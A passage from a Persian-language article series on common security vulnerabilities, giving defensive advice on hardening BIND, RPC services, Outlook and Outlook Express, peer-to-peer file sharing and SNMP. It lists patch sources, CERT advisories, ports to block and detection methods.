بررسی دقيق سيستم های DNS بمنظور تشخيص نقاط  آسيب پذيراست ، نيز استفاده گردد .
نحوه حفاظت در مقابل نقطه آسيب پذير
بمنظور حفاظت در مقابل نقاط آسيب پذير مرتبط با BIND موارد زير پيشنهاد می گردد :

• غير فعال نمودن BIND deamon ( به آن  named نيز اطلاق  می گردد ) بر روی سيستم هائی که بعنوان يک سرويس دهنده DNS در نظر گرفته نشده اند .  بمنظور پيشگيری ازاعمال برخی تغييرات خاص ( نظير فعال نمودن مجدد آن ) ،  می توان  نرم افزار BIND  را از روی اينگونه سيستم ها حذف نمود.
• بمنظور بهنگام سازی سرويس دهنده DNS ، از تمامی Patch های ارائه شده توسط توليد کنندگان استفاده و در صورت امکان آن را به آخرين نسخه موجود ارتقاء دهيد . برای دريافت اطلاعات تکميلی در رابطه با نصب مطمئن تر BIND ، از مقالات ارائه شده درسايت CERT و بخش UNIX Security Checklist ، استفاده نمائيد .
• بمنظور پيچيده تر نمودن حملات اتوماتيک و يا پويش سيستم مورد نظر ، Banner مربوط به " Version String " را از BIND حذف و نسخه واقعی BIND  را با يک شماره نسخه غيرواقعی در فايل named.conf ، جايگزين نمائيد .
• امکان ارسال انتقالات Zone را صرفا" برای سرويس دهندگان ثانويه DNS در Domain فراهم نمائيد (  secondary DNS servers) . امکان انتقالات Zone در ارتباط با  Domain های Parent و Child را غير فعال و در مقابل از امکان Delegation ( واگذاری مسئوليت ) و فورواردينگ ( Forwarding ) استفاده نمائيد .
• امکان Recursion و glue fetching را بمنظور حفاظت در مقابل عماکرد ناصحيح  DNS Cache ، غير فعال نمائيد .
• بمنظور حفاظت در رابطه با استفاده از "named" و  تحت تاثير قرار دادن تمامی سيستم ، BIND را محدود نمائيد . بنابراين BIND بعنوان يک کاربر non-privilage در دايرکتوری Chroot اجراء می گردد. برای نسخه شمازه نه BIND از آدرس  http://www.losurs.org/docs/howto/Chroot-BIND.html استفاده نمائيد .

بمنظور حفاظت در مقابل حملات اخير و مرتبط با  نقاط آسيب پذير کشف شده BIND  می توان از منابع زير استفاده نمود:

• برای نقطه آسيب پذير DoS در رابطه با ISC BIND 9 از آدرس  http//www.cert.org/advisories/CA-2002-15.html استفاده گردد.
• چندين نقطه آسيب پذير DoS در رابطه با ISC BIND 8  از آدرس  http://www.isc.org/products/BIND/bind-security.html استفاده گردد .

برای آگاهی و استفاده از پيشنهادات لازم بمنظور نصب ايمن تر BIND بر روی سيستم های سولاريس ، می توان از آدرس : Running the BIND9 DNS Server Securely و آرشيو مقالات ارائه شده در آدرس Afentis استفاده نمود.

دومين  نقطه آسيب پذير :  ( Remote Procedure Calls (RPC
با استفاده از RPC برنامه های موجود بر روی يک کامپيوتر قادر به  اجرای روتين هائی در کامپيوتر دوم از طريق  ارسال داده و بازيابی نتايج می باشند . با توجه به جايگاه عملياتی RPC ، استفاده از آن  بسيار متداول بوده و درموارد متعددی از آن بمنظور ارائه سرويس های توزيع شده شبکه نظير مديريت از راه دور ، اشتراک فايل NFS و NIS  استفاده می گردد.وجود ضعف های امنيتی متعدد در RPC باعث  بهره برداری مهاجمان بمنظور انجام حملات مختلفی شده است .دراکثر موارد ، سرويس های RPC با مجوزهای بيش از حد معمول  ، اجراء می گردند . بدين ترتيب يک مهاجم غير مجاز قادر به استفاده از سيستم های آسيب پذير در جهت اهداف خود خواهد بود.اکثر حملات از نوع DoS در  سال 1999 و اوايل سال 2000 در ارتباط با سيستم هائی بود که دارای ضعف امنيـتی و نقظه آسيب پذير RPC بودند. مثلا" حملات گشترده و موفقيت آميز در رابطه با سيستم های نظامی امريکا ، بدليل نقطه آسيب پذير RPC کشف شده در صدها دستگاه کامپيوتر مربوط به وزارت دفاع امريکا بوده است . اخيرا" نيز  وجود يک ضعف امنيتی DCOM RPC  در ويندوز ،  باعث انتشار گسترده يک کرم  در سطح اينترنت گرديد .

سيستم های عامل در معرض تهديد :
تمامی نسخه های يونيکس و لينوکس که بر روی آنان سرويس های RPC نصب شده است در معرض اين آسيب می باشند .

نحوه تشخيص آسيب پذيری سيستم
با استفاده از يک پويشگر نقاط آسيب پذير و يا دستور " rpcinfo" ، می توان از اجراء يکی از سرويس های متداول RPC  بر روی سيستم آگاه گريد :

RPC Service	RPC Program Number
rpc.ttdbserverd	100083
rpc.cmsd	100068
rpc.statd	100024
rpc.mountd	100005
sadmind	100232
cachefsd	100235
snmpXdmid	100249

سرويس های RPC ، عموما" از طريق حملات buffer Overflow ، مورد سوء استفاده قرار می گيرند .علت اين امر ، عدم انجام بررسی لازم و کافی در خصوص خطاها و يا اعتبار داده های ورودی توسط برنامه های RPC است . نقاط آسيب پذير Buffer overflow ، اين امکان را برای يک مهاجم فراهم می نمايد که داده غير قابل پيش بينی را ( اغلب بصورت کد مخرب ) به درون حافظه برنامه ، ارسال نمايد . با توجه به ضعف موجود در رابطه با بررسی خطاء و  صحت داده ، داده ارسالی مکان هائی حساس و کليدی که مورد استفاده پردازنده می باشند را بازنويسی می نمايد.در يک تهاجم موفقيت آميز Overflow ، کد مخرب ارسالی ،در ادامه توسط سيستم عامل اجراء می گردد . با توجه به اينکه تعداد زيادی از سرويس های RPC ، با مجوزهای بيش از حد معمول ،  اجراء می گردند ، استفاده موفقيت آميز از نقاط آسيب پذير فوق می تواند امکان دسـيابی غير مجاز و از راه  دور را به سيستم فراهم می نمايد.

نحوه حفاظت در مقابل نقطه آسيب پذير 
بمنظور حفاظت سيستم در مقابل حملات مبتنی بر RPC ، موارد زير پيشنهاد می گردد :

• غير فعال نمودن و يا حذف هر يک از سرويس های  RPC که ضرورتی به استفاده از آن  بر روی شبکه  نمی باشد .
• نصب آخرين Patch ارائه شده در رابطه با سرويس هائی که امکان حذف آنان وجود ندارد:
  - برای نرم افزار سولاريس از آدرس  ( http://sunsolve.sun.com )   استفاده گردد.
  - برای IBM AIX  از آدرس : http://www.ibm.com/support/us و  http://techsupport.services.ibm.com/server/fixes استفاده گردد.
  - برای نرم افزار SGI  از آدرس :  http://support.sgi.com استفاده گردد .
  - برای کامپک ( Digital Unix ) از آدرس    http://www.compaq.com/support
  - برای لينوکس  از آدرس :  http://www.redhat.com/apps/support/errata و http://www.debian.org./security استفاده گردد .
• عمليات جستجو بمنظور آگاهی و نصب آخرين Patch  مربوطه می بايست بصورت مستمر انجام شود.
• پورت 111 ( TCP و UDP ) مربوط به RPC portmapper  و پورت 135 ( TCP و UDP ) مربوط به  Windows RPC را در سطح روتر و يا فايروال بلاک نمائيد .
• پورت های Loopback  32770 ، 32789  مربوط بهTCP و UDP را بلاک نمائيد .
• فعال نمودن يک پشته غيراجرائی  بر روی سيستم های عاملی که از ويژگی فوق ، حمايت می نمايند. استفاده از يک پشته غيراجرائی ، لايه ای حفاظتی در مقابل تمامی حملات Buffer overflows نبوده ولی می تواند عاملی موثر در جهت مقابله با برخی از حملات استاندارد گردد.
• در ارتباط با سيستم های فايل NFS صادراتی  ، مراحل زير می بايست دنبال گردد :
  - استفاده از ميزبان / IP   مبتنی بر ليست های صادراتی
  - پيکربندی سيستم های  فايل صادراتی بصورت فقط خواندنی
  - استفاده از "nfsbug" برای پويش نقاط آسيب پذير

برای اخذ اطلاعات تکميلی در رابطه با نقاط آسيب پذير RPC ،  می توان از آدرس های زير استفاده نمود :

• http://www.cert.org/advisories/CA-2000-17.html
• http://www.cert.org/advisories/CA-1999-05.html
• http://www.cert.org/advisories/CA-1997-26.html
• http://www.cert.org/advisories/CA-2002-26.html
• http://www.cert.org/advisories/CA-2002-20.html
• http://www.cert.org/advisories/CA-2001-27.html
• http://www.cert.org/advisories/CA-2002-25.html
• http://www.cert.org/advisories/CA-1999-08.html
• http://www.cert.org/advisories/CA-2002-11.html
• http://www.cert.org/advisories/CA-1999-16.html
• http://www.cert.org/advisories/CA-2001-11.html
• http://www.cert.org/advisories/CA-1998-12.html
• http://www.cert.org/advisories/CA-2001-05.html
• http://www.cert.org/advisories/CA-2002-10.html
• http://www.cert.org/advisories/CA-2003-10.html
• http://www.cert.org/advisories/CA-2003-16.html
• http://www.cert.org/advisories/CA-2003-19.html

در بخش دو م اين مقاله به بررسی ساير نقاط آسيب پذير يونيکیس و لينوکس خواهيم پرداخت .

آنچه تاکنون گفته شده است :

• بخش اول : بررسی IIS  و MSSQL
• بخش دوم : بررسی  Windows Authentication
• بخش سوم :بررسی IE و Remote Access Services
• بخش چهارم : بررسی MDAC و WSH

در بخش پنجم  اين مقاله به بررسی نقاط آسيب پذير      (Microsoft Outlook Outlook Express   ،  Peer to Peer File Sharing (P2P   و( Simple Network Management Protocol (SNMP خواهيم پرداخت .

هشتمين  نقطه آسيب پذير : Microsoft Outlook ,Outlook Express
برنامه Outlook ( بخشی از مجموعه نرم افزارهای آفيس )، يک مدير اطلاعات شخصی و  سرويس گيرنده پست الکترونيکی ارائه شده توسط مايکروسافت است . برنامه فوق ، علاوه بر ارائه خدمات اوليه مرتبط با يک برنامه پست الکترونيکی ، امکان مديريت تماس ها ، فعاليت ها و زمان را نيز فراهم می نمايد .در صورت ارتباط Outlook با  برنامه Exchange Server ( سرويس دهنده پست الکترونيکی ارائه شده توسط مايکروسافت ) ، توانائی و پتانسيل های آن مضاعف می گردد. حمايت از چندين کاربر ، ارائه تسهيلات لازم در خصوص تنظيم قرار ملاقات ، زمان ، اشتراک تقويم و صندوق پستی ، نمونه هائی از پتانسيل های موجود در اين زمينه می باشند .
Outlook Express) OE) ، نخسه ای رايگان و با قابليت های کمتر نسبت به Outlook بوده که همزمان با ارائه IE نسخه يک ، بهمراه آن بر روی  سيستم  نصب می گردد( از زمان معرفی ويندوز 95 ، همواره بعنوان يک بخش لاينفک مطرح بوده است ) . با  تلفيق  محصولاتی نظير IE و OE  در ساير نرم افزارهای توليدی مايکروسافت نظير Backoffice ، آفيس  و  ساير نسخه های سيستم عامل ويندوز ، امکان استفاده از تکنولوژی های متداول و کد مربوطه بين پلات فرم،  فراهم می گردد . بعنوان نمونه ، برنامه OutLook 98  مشابه Outlook Express از  پارسينگ HTML مربوط به IE و موتور rendering استفاده می نمايد . بنابراين در صورت نصب  Outlook 98 (بدون نسخه چهار و يا بالاتر) ،امکان نصب برنامه IE نيز فراهم خواهد شد . استفاده از رويکرد فوق ، دستاوردهای مثبتی همچون :استفاده موثرتر از کد را بدنبال خواهد داشت ولی با توجه به استفاده مشترک از عناصر موجود ، در صورت بروز اشکال در يک نقطه ، دامنه آن گريبانگير محصولات متعددی خواهد شد. مثلا" در صورت وجود يک ضعف امنيتی در يک عنصر خاص ، ضعف موجود بسرعت گسترش و زمينه سوء استفاده از آن در يک محدوده وسيعتر در اختيار مهاجمان قرار خواهد گرفت .قطعا" در چنين شرايطی نگهداری يک محيط عملياتی ايمن و مطمئن ، چالش های خاص خود را بدنبال خواهد داشت . يکی از اهداف مايکروسافت  ، پياده سازی يک راه حل مناسب بمنظور مديريت اطلاعات و نامه های الکترونيکی  با قابليت استفاده مجدد بوده است. ويژگی های اتوماتيک ارائه شده با کنترل های امنيتی ايجاد شده در تعارض بوده و اين موضوع می تواند زمينه بروز تهديدات و خطراتی را از ناحيه  ويروس های مبتنی بر نامه های الکترونيکی ، کرم ها  و کدهای مخرب بدنبال داشته باشد .

سيستم های عامل در معرض تهديد
OE ، سرويس گيرنده نامه های الکترونيکی رايگان ارائه شده بهمراه تمامی نسخه های IE و ويندوز  است . بمنظور آگاهی از نسخه نرم افزار OE ، پس از اجرای برنامه IE ، با فعال نمودن گزينه About از طريق منوی Help ، می توان از شماره نسخه نرم افزار فوق بر روی سيستم آگاهی يافت . نسخه های پايئن تر از پنج می بايست بلافاصله به نسخه جديد ارتقاء داده شوند.
OutLook ، يک مدير اطلاعاتی با قابليت های فراوان است که هم  بعنوان يک برنامه جداگانه و هم بعنوان عضوی از خانواده آفيس ارائه می گردد . برنامه فوق بصورت اتوماتيک بر روی يک سيستم نصب نخواهد شد و می بايست در خصوص نصب آن ، تصميم گيری گردد.( نصب پيش فرض جايگاهی ندارد) .
برنامه Outlook دارای نسخه های متعددی است :

• Outlook 95
• Outlook 97
• Outlook 2000 ( به آن  Outlook 9 نيز گفته می شود )
• Outlook XP ( که به آن Outlook 10 و يا Outlook 2002  نيز گفته می شود )

با فعال نمودن گزينه About از طريق منوی Help ، ( پس از اجرای برنامه IE  ) می توان از شماره نسخه برنامه OE نصب شده بر روی سيستم ، آگاهی يافت . نسخه های پائين تر از 2000 می بايست بسرعت patch و بهنگام گردند . در اين رابطه می توان از منابع اطلاعاتی زير استفاده  نمود :

- http://www.microsoft.com/windows/oe/
- http://www.microsoft.com/office/outlook/

نحوه تشخيص آسيب پذير ی سيستم
تمامی کامپيوترهائی که بر روی آنان سيستم های عامل ويندوز نصب و يا دارای يک نسخه از IE می باشند که بهمراه آن برنامه Outlook Express نيز نصب شده است ، در معرض آسيب قرار خواهند داشت . با استفاده از برنامه نصب مجموعه برنامه های آفيس ، می توان اقدام به نصب برنامه Outlook نمود . نسخه های ارائه شده OE و Outlook برای مکينتاش نيز دارای مسائل امنيتی خاص خود می باشند.  در صورت عدم بهنگام سازی نسخه نصب شده و يا عدم رعايت تنظيمات امنيتی مربوطه ، سيستم در معرض تهديد قرار خواهد داشت .

نحوه حفاظت در مقابل نقطه آسيب پذير
بمنظور حفاظت در مقابل نقطه آسيب پذير فوق  و کاهش تهديدات موجود در اين زمينه می باسيت عمليات مختلفی را انجام داد: 
ايمن سازی Outlook و Outlook Express
نصب و تنظيمات پيش فرض برنامه های Outlook و Outlook Express دارای ضعف امنيتی است . در اين رابطه می بايست بررسی لازم در خصوص تنظيمات امنيتی  انجام و از بهنگام بودن نسخه نصب شده مطمئن گرديد. در اينخصوص موارد زير پيشنهاد می گردد :

• استفاده مستمر از سايت  http://windowsupdate.microsoft.com و نصب تمامی Patch های ارائه شده خصوصا" Critical ( بحرانی )
• غير فعال نمودن پانل نمايش اوليه (Preview ) . با انتخاب گزينه Layout از طريق منوی  View زمينه غير فعال نمودن گزينه  Show preview pane  فراهم می گردد.
• مستحکمتر نمودن تنظيمات ناحيه امنيتی (Security zone) مرتبط با نامه های الکترونيکی  . در اين  رابطه از طريق منوی Tools گزينه Options انتخاب و پس از کليک نمودن  بر روی Security Tab ،  گزينه( Restricted sites zone(More secure انتخاب و مقدار موردنطر High در نظر گرفته شود.

آموزش کاربر ان
با توجه به نقش بسيار مهم عوامل انسانی در ارتباط با فرآيند ايمن سازی اطلاعات ، می بايست کاربران در رابطه با استفاده از نامه های الکترونيکی بدرستی آموزش و توصيه های امنيتی لازم به آنان ارائه گردد. ذکر موارد زير به کاربران ضروری می باشد :

• در زمان دريافت يک فايل ضميمه ، حتی اگر منبع ارسال کننده آن مطمئن باشد ، می بايست در ابتدا و قبل از فعال نمودن آن ، بررسی لازم در خصوص ويروس های کامپيوتری انجام شود .
• در زمان دريافت يک فايل ضميمه ، لازم است در ابتدا آن را در يک فولدر ( غير از My Documents ) ذخيره نمود . ( آدرس فوق ، توسط تعداد زيادی از ويروس ها بعنوان نقطه شروع يک تهاجم انتخاب می گردد ) .در اين راستا می توان  فولدر ديگری و يا حتی ماشينی ديگر را انتخاب نمود(تفکيک مناسب فيل های ضميمه دريافتی از ساير فايل های موجود بر روی کامپيوتر) .
• از فعال نمودن فايل های ضميمه همراه يک نامه الکترونيکی  خودداری شود. لازم است به اين نکته مهم اشاره گردد که حتی  فايل های DOC و يا XSL می توانند شامل کدهای مخربی باشند که سيستم را در معرض تهديد و آسيب قرار دهد.
• درصورتيکه لازم است فايل دريافتی با استفاده از ساير محصولات مايکروسافت فعال گردد (نظير Word ) ، می بايست مقدار High برای گزينه Disable macro  درنظر گرفته شود.

آنتی ويروس
نرم افزارهای آنتی ويروس ، امکانات مناسبی را در خصوص حفاظت کامپيوترها در مقابل اکثر کرم ها ، ويروس ها و  ساير کدهای مخرب ، ارائه می نمايند . بانک های اطلاعاتی آنتی ويروس ها حداقل بصورت هفتگی بهنگام می گردند. بمنظور اطمينان از حفاظت در مقابل جديدترين تهديدات، اکثر برنامه های پيشرفته آنتی ويروس ، عمليات بهنگام سازی را بصورت اتوماتيک انجام می دهند.  برنامه های جديد و پيشرفته آنتی ويروس دارای قابليت بررسی و پويش تمامی نامه های وارده وصادره بمنظور اطمينان از بلاک نمودن فايل های شامل کد مخرب و يا اسکريپت ، قبل از تهديد سيستم ها توسط آنان می باشند. پيشنهاد می گردد ،ابزارهای حفاظتی آنتی ويروس قبل از استفاده از نامه های الکترونيکی و يا اينترنت ، بهنگام گردند. تعداد زيادی از ويروس ها وکرم ها  از طريق سرويس گيرندگان نامه های الکترونيکی بصورت فايل های ضميمه  و يا کد اسکريپت مخرب، در زمان مشاهده Preview ،گسترش می يابند .بمنظور دستيابی به مرجع برنامه های آنتی ويروس در سايت مايکروسافت ، می توان از آدرس  http://www.microsoft.com/security/protect/antivirus.asp استفاده نمود.
بهنگام سازی Outlook و Outlook Express .
برنامه Outlook Express طی ساليان اخير بدفعات ارتقاء يافته است ( با هدف افزايش قابليت ها و ايمنی بالاتر ) . بمنظور دريافت آخرين نسخه  برنامه فوق، می توان از آدرس  http://www.microsoft.com/windows/oe ، استفاده نمود. بمنظور اطمينان ازبهنگام بودن Outlook و ساير برنامه های آفيس می توان از آدرس  Office Product Updates page استفاده نمود . سايت فوق بصورت اتوماتيک موارد بحرانی را تشخيص و بهنگام سازی لازم وضروری را پيشنهاد می نمايد .  بمنظور آگاهی از جزئيات مربوط به ساير موارد ايمنی و تنطيمات مرتبط به نسخه آفيس XP ، می توان از آدرس   Office XP Security white paper استفاده نمود . لازم است به اين نکته مهم اشاره گردد که در صورتيکه سيستم شما بخشی از يک شبکه می باشد ، می بايست قبل از اعمال هر گونه تغييرات بر روی سيستم ، موضوع به اطلاع مديريت سيستم رسانده شود. مديران سيستم می توانند بمنظور آشنائی با جزئيات مربوط به بهنگام سازی امنيتی نامه های الکترونيکی در Outlook ، از Office Resource Kit استفاده نمايند .
Uninstall نمودن Outlook و Outlook Express 
در صورتيکه از يک برنامه خاص ديگر بمنظور نامه های الکترونيکی و يا سرويس گيرنده مديريت اطلاعات استفاده می گردد ، می توان اقدام به Uninstall نمودن برنامه های Outlook و Outlook Express از روی سيستم نمود:

• در صورت نصب Outlook  بر روی تمامی نسخه های ويندوز می توان با استفاده از گزينه Add/Remove Program  اقدام به Uninstall نمودن برنامه نمود.
• در صورت نصب Outlook Express بر روی ويندوز 98 و يا ME ، می توان با انتخاب آيکون Add/Remove Program  و گزينه Windows Setup و انتخاب Outlook Express امکان حذف آن رافراهم نمود .
• در صورت نصب Outlook Express بر روی ويندوز 2000 و يا XP  ، می توان با توجه به پيچيدگی عمليات مربوطه از آدرس های زير استفاده نمود : 
  - کاربران ويندوز 2000 که از نسخه Outlook Express Version 5.x/6.0 استفاده می نمايند ، می توانند از آدرس  http://support.microsoft.com/default.aspx?scid=kb;EN-US;q263837 استفاده نمايند .
  - کاربران ويندوز 98 و يا ME که از نسخه Outlook Expree Version 5.x/6.0 استفاده می نمايند ، می توانند از آدرس http://support.microsoft.com/default.aspx?scid=kb;EN-US;q256219 استفاده نمايند .

نهمين  نقطه آسيب پذير :  (Windows Peer to Peer File Sharing (P2P
نقطه آسيب پذير فوق ، با ساير موارد اشاره شده متفاوت بوده و اين امکان را فراهم می نمايد که برنامه های نظير به نظير ، بمنزله برنامه های User mode در نظر گرفته شوند .اين نوع از برنامه ها در ساليان اخير بسرعت رشد و مورد استفاده قرار می گيرند. از برنامه های فوق ، بمنظور Download و توزيع انواع متفاوتی از داده ( موزيک ، ويدئو ، گرافيک ، متن ، Source code برنامه ) استفاده می گردد . داده های مبادله شده از طريق برنامه های فوق اغلب مشکوک و دراکثر موارد قوانين کپی رايت بين المللی را نقص می نمايند. بر اساس گزارشات ارائه شده توسط Napster ، برنامه های فوق اغلب بصورت يک برنامه سرويس گيرنده توزيع و زمينه اشتراک فايل ها ، دايرکتوری ها و حتی تمامی فضای ذخيره سازی هارد ديسک را فراهم می نمايد . کاربران با استفاده از برنامه های سرويس گيرنده ، پارامتر مورد نظر خود برای جستجو را مشخص و در ادامه يک و يا چندين کانال ارتباطی بين  شرکت کنندگان بعنوان نرم افزار سرويس گيرنده و ارتباط با ساير شرکت کنندگان در شبکه های ديگر بمنظور مکان يابی فايل های  مورد نظر ايجاد می گردد. سرويس گيرندگان قادر به دريافت فايل از ساير کاربران بوده و می توانند داده های موجود بر روی سيستم خود را برای استفاده ديگران به اشتراک گذارند.
فرآيند ارتباطات نظير به نظير شامل دريافت درخواست ها ، پاسخ به آنان و ارسال فايل ها می باشد . يک سرويس گيرنده (شرکت کننده)  می تواند بطور همزمان چندين download را انجام و  در همان زمان اقدام به انجام چندين upload نمايد . جستجو برای يافتن محتوی می تواند شامل هر نوع رشته حرفی مورد نظر کاربر باشد . اکثر برنامه های فوق در حال حاضر از پورت های پيش فرض استفاده می نمايند ولی می توان بصورت اتوماتيک و يا دستی آن را بمنظور استفاده از پورت  ديگر تنظيم نمود . سمت و سوی اين تکنولوژی  بسمت  استفاده از http wrappers بوده که با ارائه تسهيلات لازم محدوديت های اعمال شده در سطح يک سازمان بمنظور استفاده از اينترنت را ناديده خواهد گرفت . با توجه به ماهيت multithread  برنامه های فوق در ارتباط با جستجو و انتقال فايل ها ، ترافيک شبکه های LAN افزايش و حتی  در موارد خاص امکان اشباع  کامل لينک های WAN نيز وجود خواهد داشت .  در زمان استفاده از برنامه های P2P ، سيتستم ها در معرض آسيب و تهديد جدی قرار خواهند گرفت . تهديدات فوق ، می تواند باعث حملاتی از نوع   DoS  ،  دستيابی غير مجاز به تمامی شبکه ( بدليل ضعف در پيکربندی سرويس گيرنده P2P ) و بمخاطره انداختن اطلاعات محرمانه ( هيچگونه محدوديتی دررابطه با  نوع فايلی که به اشتراک گذاشته می شود ، وجود ندارد )  گردد .در اين رابطه مسائل قانونی ( کپی رايت ) مربوطه نيز وجود داشته که بطور جدی توسط شرکت های ارائه دهنده محصولات ( صوتی ، تصويری ، نرم افزارهای کاربردی و ... )  دنبال می گردد .محتوی ارائه شده از طريق برنامه های P2P شامل قانونی کپی رايت بوده  ( موزيک ، فيلم و برنامه )  و استفاده کنندگان از اين نوع برنامه ها می بايست به اين موضوع مهم نيز توجه نمايند !

سيستم های عامل در معرض تهديد
از برنامه های  P2P ، می توان در ارتباط با تمامی نسخه های موجود سيستم عامل ويندوز استفاده نمود( نسخه های متعددی بمنظور نصب بر روی ويندوز نوشته شده است ) . البته در اين رابطه نسخه های مربوط به سيستم های  عامل  يونيکس و لينوکس نيز وجود داشته و آنان نيز  در معرض اين تهديد می باشند .

نحوه تشخيص آسيب پذير ی سيستم
تشخيص استفاده از برنامه های P2P بر روی شبکه ، چالش های خاص خود را بدنبال خواهد داشت  .دراين رابطه موارد زير پيشنهاد می گردد :

• مانيتورينگ ترافيک شبکه بر روی پورت های متداول استفاده  شده توسط اين نوع از برنامه ها
• جستجو ترافيک شبکه برای application layer strings  که عموما" توسط برنامه های P2P استفاده می گردد.
• بررسی مکان های ذخيره سازی شبکه بمنظور کنترل محتوی download شده توسط کاربر (فايل های    mp3, *.wma, *.avi, *.mpg, *.mpeg, *.jpg, *.gif, *.zip.*  و exe. * )
• مانيتورينگ فضاء ذخيره سازی شبکه  برای کاهش ناگهانی ظرفيت آزاد ديسک

نحوه حفاظت در مقابل نقطه آسيب پذير
بمنظور حفاظت در مقابل نقطه آسيب پذير فوق ، می بايست عمليات متفاوتی را انجام داد :
سياست شرکت / سازمان

• استفاده از يک سياست معقول در ارتباط با downloading و قانون کپی رايت در هر سازمان
• استفاده از يک سياست معقول در ارتباط با  نحوه استفاده از اينترنت در هر سازمان
• بررسی مستمر فضای ذخيره سازی شبکه و ايستگاههای شبکه برای  محتوی غير مجاز

محدوديت شبکه

• کاربران معمولی نمی بايست قادر به نصب نرم افزار خصوصا" نرم افزارهای P2P باشند .
• استفاده از يک سرويس دهنده پروکسی بمنظور کنترل دستيابی به اينترنت
• فيلتريتگ ( خروجی / ورودی ) پورت ها ی استفاده شده توسط برنامه های P2P
• مانيتورينگ شبکه خصوصا" در ارتباط با  ترافيک P2P
• استفاده روزانه از نرم افزارهای آنتی ويروس بهنگام شده

پورت های متدوال استفاده شده توسط برنامه های P2P :

• برنامه Napsster ( پورت های TCP شماره : 8888 ، 8875 ، 6699 )
• برنامه eDonkey ( پورت های TCP شماره 4661 ، 4662 ، 4665 )
• برنامه Gnutella ( پورت های TCP/UDP شماره 6345 ، 6346 ، 6347 )
• برنامه Kazza   ( پورت TCP شماره هشتاد برای www ، و پورت TCP/UDP شماره 1214 )

دهمين  نقطه آسيب پذير : ( Simple Network Management Protocol (SNMP
از پروتکل SNMP بمنظور کنترل ، مانيتورينگ از راه دور و پيکربندی  تمامی دستگاه های پيشرفته مبتنی بر TCP/IP استفاده می شود.با اينکه  استفاده از SNMP در بين پلات فرم های متفاوت شبکه استفاده می گردد، ولی در اغلب موارد از آن  بمنظور پيکربندی و مديريت دستگاههائی نظير چاپگر ، روترها ، سوئيچ ها ، Access point ها  و دريافت داده های مورد نياز دستگاههای مانيتورينگ شبکه ، استفاده می شود .
SNMP ، از روش های متفاوتی بمنظور مبادله پيام بين ايستگاههای مديريت SNMP و دستگاههای شبکه ای  استفاده می نمايد . روش های استفاده شده بمنظور برخورد با پيام های مبادله شده و مکانيزم تائيد و معتبر سازی پيا م ها،  از جمله عوامل اصلی در رابطه با  نقاط آسيب پذير SNMP می باشند .
نقاط آسيب پذير مرتبط با روش های استفاده شده در SNMP ( نسخه يک )  بهمراه جزئيات مربوطه را می توان در آدرس  CERT - 2002 - 03 ، مشاهده نمود . نقاط آسيب پذير متعددی در SNMP متاثر از روش برخورد با پيام ها توسط ايستگاه های مديريتی است . نقاط آسيب پذير فوق، به نسخه ای خاص  از SNMP محدود نبوده و محصولات متعدد ارائه شده توسط توليد کنندگان را نيز شامل می گردد . مهاجمان با استفاده از نقاط آسيب پذير فوق ، قادر به انجام حملات متفاوت از نوع DoS ( از کار افتادن يک سرويس ) تا پيکربندی و مديريت ناخواسته ماشين آلات و تجهيزات مبتنی بر SNMP  ، می باشند .
برخی از نقاط آسيب پذير در ارتباط با SNMP متاثر از روش های استفاده شده بمنظور تائيد و معتبر سازی پيام ها در نسخه های قديمی SNMP  است ( توارث مشکلات ) . نسخه های يک و دو SNMP ، از يک " رشته  مشترک " غيررمز شده بعنوان  تنها  گزينه موجود  برای تائيد پيام ها استفاده می نمايند . عدم استفاده از روش های مناسب رمزنگاری ، می تواند عاملی مهم در پيدايش نقاط آسيب پذير باشد. نگرش پيش فرض  نسبت به  " رشته مشترک  " که  توسط تعداد زيادی از دستگاههای SNMP استفاده می گردد ، از ذيگر عوامل مهم در ارتباط با عرضه نقاط آسيب پذير است( برخی از توليد کنندگان بمنظور افزايش سطح ايمنی مربوط به داده های حساس ، رشته را بصورت "اختصاصی " تغيير و استفاده می نمايند ) .  شنود اطلاعاتی و ترافيک SNMP ، می تواند افشاء  اطلاعات و ساختار شبکه ( سيستم ها و دستگاههای متصل شده به آن  )  را بدنبال داشته باشد . مهاجمين با استفاده از اطلاعات فوق ، قادر به انتخاب مناسب و دقيق هدف خود بمنظور برنامه ريزی حملات خود می باشند .
اکثر توليد کنندگان بصورت پيش فرض نسخه يک SNMP را فعال و تعدادی  ديگر،  محصولاتی را ارائه می نمايند که  قادر به استفاده ازمدل های امنيتی نسخه شماره سه SNMP  نمی باشند. ( با استفاده از مدل های امنيـی ارائه شده در نسخه شماره سه SNMP ، می توان پيکربندی لازم در خصوص روش های تائيد را بهبود بخشيد ) .

SNMP  ، بصورت پيش فرض در ويندوز فعال نمی گردد .و اغلب بعنوان يک سرويس تکميلی توسط مدير يت سيستم و يا شبکه ، نصب می گردد . ساير محصولات مديريت شبکه ممکن است مستلزم Windows Service و يا نصب مربوط به خود باشند . SNMP  يک روش ارتباطی استفاده شده بمنظور مديريت چاپگرها ، سيستم های UPS ،  دستگاه های access point  و Bridges   است .  از SNMP اغلب در نسخه های متفاوت يونيکس و لينوکس  نسخه های متفاوت سيستم عامل نت ور ، تجهيزات شبکه ای و دستگاههای embedded  استفاده می شود.  با توجه به  نتايج حاصل از آناليز حملات مبتنی بر SNMP  ، مشخص شده است که اکثر حملات در اين رابطه بدليل ضعف در پيکربندی SNMP در سيستم های يونيکس است .

سيستم های عامل در معرض تهديد
تقريبا" تمامی نسخه های سيستم عامل ويندوز بهمراه يک گزينه نصب انتخابی در اينخصوص ارائه شده اند .  سرويس فوق بصورت پيش فرض نصب و فعال نمی باشد. اکثر دستگاه ها و سيستم های عامل شبکه ای مبتنی بر SNMP دارای نقطه آسيب پذير فوق بوده و در معرض تهديد قرار خواهند داشت .

نحوه تشخيص آسيب پذيری سيستم
بمنظور بررسی نصب SNMP  بر روی دستگاههای موجود و متصل شده در شبکه ، می توان از يک برنامه کمکی و يا روش دستی استفاده نمود. برنامه پويشگر SNScan ، نمونه ای در اين زمينه بوده که می توان آن را از طريق آدرس  http://www.foundstone.com/knowledge/free_tools.html دريافت نمود. در موارديکه امکان استفاده از ابزارهای  پويشگر وجود ندارد ، می توان بررسی لازم در خصوص نصب و اجراء SNMP  را بصورت دستی انجام داد. در اين راستا می توان به مستندات سيستم عامل مربوطه مراجعه تا پس از آگاهی از نحوه پياده سازی SNMP  ، عمليات لازم بمنظور تشخيص فعال بودن SNMP را انجام داد
